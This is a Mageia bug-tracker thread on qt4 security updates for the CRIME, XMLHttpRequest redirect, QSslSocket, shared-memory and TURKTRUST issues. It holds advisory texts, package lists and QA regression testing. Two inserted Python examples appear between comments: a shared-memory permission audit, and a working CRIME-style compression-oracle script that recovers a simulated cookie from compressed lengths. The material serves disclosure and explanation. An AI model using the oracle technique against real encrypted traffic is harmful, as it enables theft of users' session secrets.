openSUSE has issued an advisory on October 31:
http://lists.opensuse.org/opensuse-updates/2012-10/msg00096.html

It sounds like the same issue as this one, which Fedora issued an advisory for on October 2:
http://lists.fedoraproject.org/pipermail/package-announce/2012-October/089815.html

which references upstream here:
http://qt.digia.com/Release-Notes/security-issue-september-2012/

from http://lwn.net/Vulnerabilities/519844/

It is unclear which versions are affected.
CC: (none) => nicolas.lecureuil
Whiteboard: (none) => MGA2TOO, MGA1TOO
CC: (none) => balcaen.john
Ubuntu has issued an advisory for this on November 8: http://www.ubuntu.com/usn/usn-1628-1/
Fedora has issued an advisory on December 5:
http://lists.fedoraproject.org/pipermail/package-announce/2012-December/094633.html

This fixes a new upstream security issue, fixed in 4.8.4:
http://lists.qt-project.org/pipermail/announce/2012-November/000014.html
The CVE for the security issue in Comment 2 is CVE-2012-5624. LWN reference: http://lwn.net/Vulnerabilities/529993/
Summary: qt4 new security issue CVE-2012-4929 => qt4 new security issues CVE-2012-4929 and CVE-2012-5624
CC: (none) => oe
We now have qt4 4.8.4 in Cauldron, hopefully CVE-2012-4929 isn't an issue there. Mageia 1 is EOL.
Version: Cauldron => 2
Whiteboard: MGA2TOO, MGA1TOO => (none)
Fix in r338296 (mga2, updates_testing, qt4-4.8.3-1.2.mga2).
Oden, you missed CVE-2012-5624.
Bumped it to qt4-4.8.4-1.mga2
Thanks Oden! Assigning to QA.

Advisory:
========================

Updated qt4 packages fix security vulnerabilities:

A security vulnerability has been discovered in the SSL/TLS protocol, which affects connections using compression. The protocol, as used by Qt before 4.8.4, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a "CRIME" attack (CVE-2012-4929).

The XMLHttpRequest object in Qt is intended to offer similar behaviour to that in web browsers, though it intentionally does not enforce the same-origin policy. It has been determined that the implementation in Qt will allow redirection from http to file schemes which may allow an attacker performing a man-in-the-middle attack to cause QML applications to leak sensitive information (CVE-2012-5624).

This update provides Qt4 4.8.4, which disables SSL/TLS compression by default to mitigate CVE-2012-4929 and makes the rules for redirects a bit stricter to mitigate CVE-2012-5624.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4929
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5624
http://qt.digia.com/Release-Notes/security-issue-september-2012/
http://lists.qt-project.org/pipermail/announce/2012-November/000014.html
http://qt.digia.com/Release-Notes/Release-Notes-Qt-484/
http://lists.fedoraproject.org/pipermail/package-announce/2012-October/089815.html
http://lists.opensuse.org/opensuse-updates/2012-10/msg00096.html
http://lists.fedoraproject.org/pipermail/package-announce/2012-December/094633.html
========================

Updated packages in core/updates_testing:
========================

qt4-common-4.8.4-1.mga2
libqtxml4-4.8.4-1.mga2
libqtscripttools4-4.8.4-1.mga2
libqtxmlpatterns4-4.8.4-1.mga2
libqtsql4-4.8.4-1.mga2
libqtnetwork4-4.8.4-1.mga2
libqtscript4-4.8.4-1.mga2
libqtgui4-4.8.4-1.mga2
libqtsvg4-4.8.4-1.mga2
libqttest4-4.8.4-1.mga2
libqthelp4-4.8.4-1.mga2
libqtclucene4-4.8.4-1.mga2
libqtcore4-4.8.4-1.mga2
libqt3support4-4.8.4-1.mga2
libqtopengl4-4.8.4-1.mga2
libqtdesigner4-4.8.4-1.mga2
libqtdbus4-4.8.4-1.mga2
libqtmultimedia4-4.8.4-1.mga2
qt4-qtdbus-4.8.4-1.mga2
libqtdeclarative4-4.8.4-1.mga2
qt4-qmlviewer-4.8.4-1.mga2
libqt4-devel-4.8.4-1.mga2
qt4-devel-private-4.8.4-1.mga2
qt4-xmlpatterns-4.8.4-1.mga2
qt4-qtconfig-4.8.4-1.mga2
qt4-doc-4.8.4-1.mga2
qt4-demos-4.8.4-1.mga2
qt4-examples-4.8.4-1.mga2
qt4-linguist-4.8.4-1.mga2
qt4-assistant-4.8.4-1.mga2
qt4-database-plugin-mysql-4.8.4-1.mga2
qt4-database-plugin-sqlite-4.8.4-1.mga2
qt4-database-plugin-tds-4.8.4-1.mga2
qt4-database-plugin-pgsql-4.8.4-1.mga2
qt4-graphicssystems-plugin-4.8.4-1.mga2
qt4-accessibility-plugin-4.8.4-1.mga2
qt4-designer-4.8.4-1.mga2
qt4-designer-plugin-webkit-4.8.4-1.mga2
qt4-designer-plugin-qt3support-4.8.4-1.mga2
qt4-qvfb-4.8.4-1.mga2
qt4-qdoc3-4.8.4-1.mga2

from qt4-4.8.4-1.mga2.src.rpm
Assignee: bugsquad => qa-bugs
Now there's CVE-2012-6093: http://lists.qt-project.org/pipermail/announce/2013-January/000020.html
CC: (none) => qa-bugs
Version: 2 => Cauldron
Assignee: qa-bugs => oe
Whiteboard: (none) => MGA2TOO
Summary: qt4 new security issues CVE-2012-4929 and CVE-2012-5624 => qt4 new security issues CVE-2012-4929, CVE-2012-5624, and CVE-2012-6093
Fedora references the issue we just fixed in our rootcerts update candidate as affecting Qt. Will ours be OK when we update rootcerts, or is this something that needs to be fixed directly in Qt itself?
http://lists.qt-project.org/pipermail/announce/2013-January/000021.html
http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096444.html

BTW Fedora also fixed CVE-2012-6093 in that update.
LWN reference for CVE-2012-6093: http://lwn.net/Vulnerabilities/532545/
(In reply to comment #10) > Fedora references the issue we just fixed in our rootcerts update candidate as > affecting Qt. Will ours be OK when we update rootcerts, or is this something > that needs to be fixed directly in Qt itself? Yes and No, kde (kdelibs4) uses the system bundle (/etc/pki/tls/certs/ca-bundle.crt) but redhat may have blacklisted the certs in qt as well (hardcoded). Hmm, yes they did after looking at those links.
I added patches in Mageia 2 and Cauldron SVN:

qt-everywhere-opensource-src-4.8.4-QTBUG-28343.patch (fix CVE-2012-6093)
qt-4.8-CVE-2013-0254.patch (fix a new issue [1])
qt-everywhere-opensource-src-4.8.4-QTBUG-28937.patch (blacklist turktrust)
qt-everywhere-opensource-src-4.8.4-QTBUG-24654.patch (more blacklisting)

[1] - http://lists.qt-project.org/pipermail/announce/2013-February/000023.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0254

If these look good to you, please push to the build system (unless you just want to wait for 4.8.5 which probably contains all of these fixes).
Pushed in Cauldron by Funda.
Version: Cauldron => 2
Whiteboard: MGA2TOO => (none)
mgarepo submit is not working at the moment, but here are additional notes for the advisory once this is pushed in mga2.
-----

Two intermediate CA certificates were mis-issued by the TURKTRUST certificate authority. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be exploited to view sensitive information (CVE-2013-0743).
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0743
http://lists.qt-project.org/pipermail/announce/2013-January/000021.html
http://www.ubuntu.com/usn/USN-1687-1/

A security flaw was found in the way the QSslSocket implementation of Qt, a software toolkit for application development, performed certificate verification callbacks when the Qt libraries were used with a different OpenSSL version than the one they were compiled against. In such a scenario, this would result in a connection error, but with the SSL error list containing QSslError:NoError instead of the proper reason for the error. This might result in a confusing error being presented to the end users, possibly encouraging them to ignore the SSL errors for the site the connection was initiated against (CVE-2012-6093).
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6093
http://lists.qt-project.org/pipermail/announce/2013-January/000020.html
http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096444.html

The QSharedMemory class in Qt 5.0.0, 4.8.x before 4.8.5, 4.7.x before 4.7.6, and other versions including 4.4.0 uses weak permissions (world-readable and world-writable) for shared memory segments, which allows local users to read sensitive information or modify critical program data, as demonstrated by reading a pixmap being sent to an X server (CVE-2013-0254).
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0254
http://lists.qt-project.org/pipermail/announce/2013-February/000023.html

Patches from upstream have been included to fix CVE-2013-0254 by forcing all System V shared memory segments to be created with user-only permissions, fix CVE-2012-6093 by using the correct public API in openssl, and fix CVE-2013-0743 by blacklisting the invalid certificates.
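To make the CVE-2013-0254 paragraph above concrete, here is an added example, written for this page and not taken from Qt or from the Mageia patches, that shows at the syscall level what the upstream fix changes: the permission bits passed to shmget() are recorded verbatim in the segment (they are not masked by the umask, unlike open(2)), so a 0666 segment really is attachable by every local user. It uses Python ctypes against glibc and assumes a Linux x86_64 layout of struct shmid_ds (mode at byte offset 20); the segment size and labels are constructed for the demonstration. audit_live_segments() is a small host check over /proc/sysvipc/shm for segments that are still exposed.

```python
"""Show the permission bits a System V shared-memory segment is created with."""
import ctypes
import ctypes.util
import os
import struct

# Linux constants from <sys/ipc.h> / <sys/shm.h> (assumption: Linux, glibc, x86_64).
IPC_PRIVATE = 0
IPC_CREAT = 0o1000
IPC_RMID = 0
IPC_STAT = 2

_libc = ctypes.CDLL(ctypes.util.find_library("c") or None, use_errno=True)
_libc.shmget.argtypes = [ctypes.c_int, ctypes.c_size_t, ctypes.c_int]
_libc.shmget.restype = ctypes.c_int
_libc.shmctl.argtypes = [ctypes.c_int, ctypes.c_int, ctypes.c_void_p]
_libc.shmctl.restype = ctypes.c_int


def _check(ret, call):
    """Turn a -1 return into an OSError carrying errno."""
    if ret < 0:
        err = ctypes.get_errno()
        raise OSError(err, f"{call}: {os.strerror(err)}")
    return ret


def create_segment(size, perm):
    """shmget(IPC_PRIVATE, size, IPC_CREAT | perm).  The low 9 bits of shmflg
    become shm_perm.mode as-is; the process umask is NOT applied, so 0o666
    here means world-readable and world-writable."""
    return _check(_libc.shmget(IPC_PRIVATE, size, IPC_CREAT | perm), "shmget")


def segment_mode(shmid):
    """Read shm_perm.mode with shmctl(IPC_STAT).  Layout assumption (glibc on
    x86_64): shmid_ds starts with struct ipc_perm = key, uid, gid, cuid, cgid
    (4 bytes each) and then an unsigned short mode at offset 20."""
    buf = ctypes.create_string_buffer(256)  # larger than sizeof(struct shmid_ds)
    _check(_libc.shmctl(shmid, IPC_STAT, buf), "shmctl(IPC_STAT)")
    (mode,) = struct.unpack_from("H", buf.raw, 20)
    return mode & 0o777


def remove_segment(shmid):
    _check(_libc.shmctl(shmid, IPC_RMID, None), "shmctl(IPC_RMID)")


def accessible_by_others(mode):
    """True if any group/other bit is set, i.e. another local user could
    shmat() the segment and read (a pixmap) or overwrite program data."""
    return bool(mode & 0o077)


def compare_modes():
    """Create one segment the pre-fix way (0666) and one the fixed way (0600)
    and return what the kernel recorded for each; segments are removed again."""
    out = {}
    for label, perm in (("vulnerable_0666", 0o666), ("fixed_0600", 0o600)):
        shmid = create_segment(4096, perm)
        try:
            out[label] = segment_mode(shmid)
        finally:
            remove_segment(shmid)
    return out


def audit_live_segments(path="/proc/sysvipc/shm"):
    """List (shmid, perms, size, uid) for every live segment on this host whose
    group/other bits are set.  The perms column of that file is octal."""
    findings = []
    try:
        with open(path) as fh:
            next(fh)  # header: key shmid perms size cpid lpid nattch uid ...
            for line in fh:
                f = line.split()
                shmid, perms, size, uid = int(f[1]), int(f[2], 8), int(f[3]), int(f[7])
                if accessible_by_others(perms):
                    findings.append((shmid, perms, size, uid))
    except FileNotFoundError:
        pass  # not Linux, or /proc not mounted
    return findings


if __name__ == "__main__":
    for label, mode in compare_modes().items():
        print(f"{label}: mode={mode:04o} exposed={accessible_by_others(mode)}")
    for shmid, perms, size, uid in audit_live_segments():
        print(f"exposed segment shmid={shmid} perms={perms:04o} size={size} uid={uid}")
```

On a box running an unpatched Qt application the audit loop is the quick regression check: any segment it lists with perms 0666 (or any group/other bit) is one the fix should have created as 0600. Note the X-server pixmap case in the advisory: read-only access (0644) is already enough to leak the image, so the check looks at all group/other bits, not only write.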
Patched package uploaded for Mageia 2.

Advisory:
========================

Updated qt4 packages fix security vulnerabilities:

A security vulnerability has been discovered in the SSL/TLS protocol, which affects connections using compression. The protocol, as used by Qt before 4.8.4, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a "CRIME" attack (CVE-2012-4929).

The XMLHttpRequest object in Qt is intended to offer similar behaviour to that in web browsers, though it intentionally does not enforce the same-origin policy. It has been determined that the implementation in Qt will allow redirection from http to file schemes which may allow an attacker performing a man-in-the-middle attack to cause QML applications to leak sensitive information (CVE-2012-5624).

A security flaw was found in the way the QSslSocket implementation of Qt, a software toolkit for application development, performed certificate verification callbacks when the Qt libraries were used with a different OpenSSL version than the one they were compiled against. In such a scenario, this would result in a connection error, but with the SSL error list containing QSslError:NoError instead of the proper reason for the error. This might result in a confusing error being presented to the end users, possibly encouraging them to ignore the SSL errors for the site the connection was initiated against (CVE-2012-6093).

Two intermediate CA certificates were mis-issued by the TURKTRUST certificate authority. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be exploited to view sensitive information (CVE-2013-0743).

The QSharedMemory class in Qt 5.0.0, 4.8.x before 4.8.5, 4.7.x before 4.7.6, and other versions including 4.4.0 uses weak permissions (world-readable and world-writable) for shared memory segments, which allows local users to read sensitive information or modify critical program data, as demonstrated by reading a pixmap being sent to an X server (CVE-2013-0254).

This update provides Qt4 4.8.4, which disables SSL/TLS compression by default to mitigate CVE-2012-4929 and makes the rules for redirects a bit stricter to mitigate CVE-2012-5624. Patches from upstream have been included to fix CVE-2013-0254 by forcing all System V shared memory segments to be created with user-only permissions, fix CVE-2012-6093 by using the correct public API in openssl, and fix CVE-2013-0743 by blacklisting the invalid certificates.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4929
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5624
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6093
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0254
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0743
http://qt.digia.com/Release-Notes/security-issue-september-2012/
http://lists.qt-project.org/pipermail/announce/2012-November/000014.html
http://qt.digia.com/Release-Notes/Release-Notes-Qt-484/
http://lists.qt-project.org/pipermail/announce/2013-January/000020.html
http://lists.qt-project.org/pipermail/announce/2013-January/000021.html
http://lists.qt-project.org/pipermail/announce/2013-February/000023.html
http://lists.fedoraproject.org/pipermail/package-announce/2012-October/089815.html
http://lists.opensuse.org/opensuse-updates/2012-10/msg00096.html
http://lists.fedoraproject.org/pipermail/package-announce/2012-December/094633.html
http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096444.html
http://www.ubuntu.com/usn/USN-1687-1/
========================

Updated packages in core/updates_testing:
========================

qt4-common-4.8.4-1.1.mga2
libqtxml4-4.8.4-1.1.mga2
libqtscripttools4-4.8.4-1.1.mga2
libqtxmlpatterns4-4.8.4-1.1.mga2
libqtsql4-4.8.4-1.1.mga2
libqtnetwork4-4.8.4-1.1.mga2
libqtscript4-4.8.4-1.1.mga2
libqtgui4-4.8.4-1.1.mga2
libqtsvg4-4.8.4-1.1.mga2
libqttest4-4.8.4-1.1.mga2
libqthelp4-4.8.4-1.1.mga2
libqtclucene4-4.8.4-1.1.mga2
libqtcore4-4.8.4-1.1.mga2
libqt3support4-4.8.4-1.1.mga2
libqtopengl4-4.8.4-1.1.mga2
libqtdesigner4-4.8.4-1.1.mga2
libqtdbus4-4.8.4-1.1.mga2
libqtmultimedia4-4.8.4-1.1.mga2
qt4-qtdbus-4.8.4-1.1.mga2
libqtdeclarative4-4.8.4-1.1.mga2
qt4-qmlviewer-4.8.4-1.1.mga2
libqt4-devel-4.8.4-1.1.mga2
qt4-devel-private-4.8.4-1.1.mga2
qt4-xmlpatterns-4.8.4-1.1.mga2
qt4-qtconfig-4.8.4-1.1.mga2
qt4-doc-4.8.4-1.1.mga2
qt4-demos-4.8.4-1.1.mga2
qt4-examples-4.8.4-1.1.mga2
qt4-linguist-4.8.4-1.1.mga2
qt4-assistant-4.8.4-1.1.mga2
qt4-database-plugin-mysql-4.8.4-1.1.mga2
qt4-database-plugin-sqlite-4.8.4-1.1.mga2
qt4-database-plugin-tds-4.8.4-1.1.mga2
qt4-database-plugin-pgsql-4.8.4-1.1.mga2
qt4-graphicssystems-plugin-4.8.4-1.1.mga2
qt4-accessibility-plugin-4.8.4-1.1.mga2
qt4-designer-4.8.4-1.1.mga2
qt4-designer-plugin-webkit-4.8.4-1.1.mga2
qt4-designer-plugin-qt3support-4.8.4-1.1.mga2
qt4-qvfb-4.8.4-1.1.mga2
qt4-qdoc3-4.8.4-1.1.mga2

from qt4-4.8.4-1.1.mga2.src.rpm
CC: qa-bugs => (none)
Assignee: oe => qa-bugs
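The CVE-2012-4929 paragraph in the advisory above (and in the earlier advisory draft) describes the oracle in one sentence; the following added Python model, written for this page and not part of Qt or of the Mageia update, plays it out end to end. It simulates the client's HTTP request compressed with raw DEFLATE, which is what TLS-level compression amounted to before Qt 4.8.4 disabled it: a constructed cookie secret that the client appends to every request, an attacker-controlled path, and an observer who sees only ciphertext lengths. The one technical assumption is that zlib picks DEFLATE's fixed Huffman table for an input this short, so that pad bytes 0x90..0x97 each cost 9 bits; stepping through 0..7 of them lets score() recover the bit-exact compressed size from byte-granular observations, which is why the recovery below is deterministic rather than lucky.

```python
"""Compression-oracle (CRIME-style) recovery of a cookie from ciphertext lengths."""
import zlib

# Constructed secret: what the victim's client attaches to every request.
SECRET_COOKIE = b"sessionid=7f3a9c2e"

# Distinct bytes >= 0x90 cost 9 bits each under DEFLATE's fixed Huffman table,
# so appending 0..7 of them walks the output through every bit alignment.
PAD = bytes(range(0x90, 0x98))


def build_request(attacker_path, pad_len=0):
    """The request as the client sends it: attacker controls the path, the
    client appends the secret cookie.  Constructed sample, not real traffic."""
    return (b"GET /" + attacker_path + PAD[:pad_len] + b" HTTP/1.1\r\n"
            b"Host: example.test\r\n"
            b"Cookie: " + SECRET_COOKIE + b"\r\n\r\n")


def compressed_length(data, compress=True):
    """What a passive observer sees: with TLS compression enabled the record
    length is the DEFLATE output length; with it disabled, the plaintext length."""
    if not compress:
        return len(data)
    c = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, no zlib framing
    return len(c.compress(data) + c.flush())


def score(attacker_path, compress=True):
    """Sum of observed lengths over the 8 pad sizes.  Because each pad byte is
    9 bits, exactly one of the 8 variants crosses a byte boundary per extra
    bit of underlying output, so the sum moves by 1 per bit: bit resolution
    from byte-granular lengths."""
    return sum(compressed_length(build_request(attacker_path, n), compress)
               for n in range(8))


def recover_secret(known_prefix, alphabet, max_len, compress=True):
    """Byte-at-a-time recovery.  The candidate that extends the LZ77 match
    between the path and the cookie by one byte saves a literal (~7-8 bits)
    and so scores lowest.  A tie means the oracle gave no information."""
    recovered = b""
    while len(recovered) < max_len:
        scores = {bytes([c]): score(known_prefix + recovered + bytes([c]), compress)
                  for c in alphabet}
        best = min(scores.values())
        winners = [c for c, s in scores.items() if s == best]
        if len(winners) != 1:
            break
        recovered += winners[0]
    return recovered


if __name__ == "__main__":
    hexdigits = b"0123456789abcdef"
    print("with compression:   ", recover_secret(b"sessionid=", hexdigits, 8))
    print("compression disabled:", recover_secret(b"sessionid=", hexdigits, 8, compress=False))
```

The second call is the mitigation the advisory describes: with compression off, every candidate yields the same length, the first round ties, and the attacker learns nothing. The example also shows why the fix had to be at the TLS layer rather than in the application: nothing in the request is malformed, and the leak is a property of compressing attacker-controlled and secret data in the same stream.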
Fedora has issued an advisory on February 8:
http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098698.html

This fixes CVE-2013-0254, which is now on LWN at:
http://lwn.net/Vulnerabilities/537754/
CVE-2013-0743 seems to have been withdrawn as a CVE, David.
No PoCs that I can see, so as with kdelibs, just checking for regressions in KDE applications.
For qt4-designer also checking the webkit plugin is present, see https://bugs.mageia.org/show_bug.cgi?id=6656#c14
Claire, are you testing x86_64? If so, I can check some apps for regressions on i586.

Carolyn
CC: (none) => isolde
Testing complete, mga2 64-bit.

Checked qt4-designer, dragged a QtWebView to the main window. qt-linguist starts OK; amarok, gwenview, quassel, konqueror, okular and general KDE use. No regressions noticed.
Whiteboard: (none) => has_procedure mga2-64-ok
Testing some apps for regressions on i586.

Carolyn

No regressions noticed with Konversation, KWrite, KTimer, KCalc, Konsole, Gwenview, Okular.

Qt Designer: created a window with a button, text label, graphicsview and LCD number, viewed the generated code in KWrite. Seems OK as far as I can tell.

Carolyn
Update validated. See comment 16 for advisory and SRPM.

Could sysadmin please push from core/updates_testing to core/updates. Thank you.

Carolyn
Keywords: (none) => validated_update
CC: (none) => sysadmin-bugs
Whiteboard: has_procedure mga2-64-ok => has_procedure mga2-64-ok mga-32-ok
Update pushed: https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0053
Status: NEW => RESOLVED
CC: (none) => tmb
Resolution: (none) => FIXED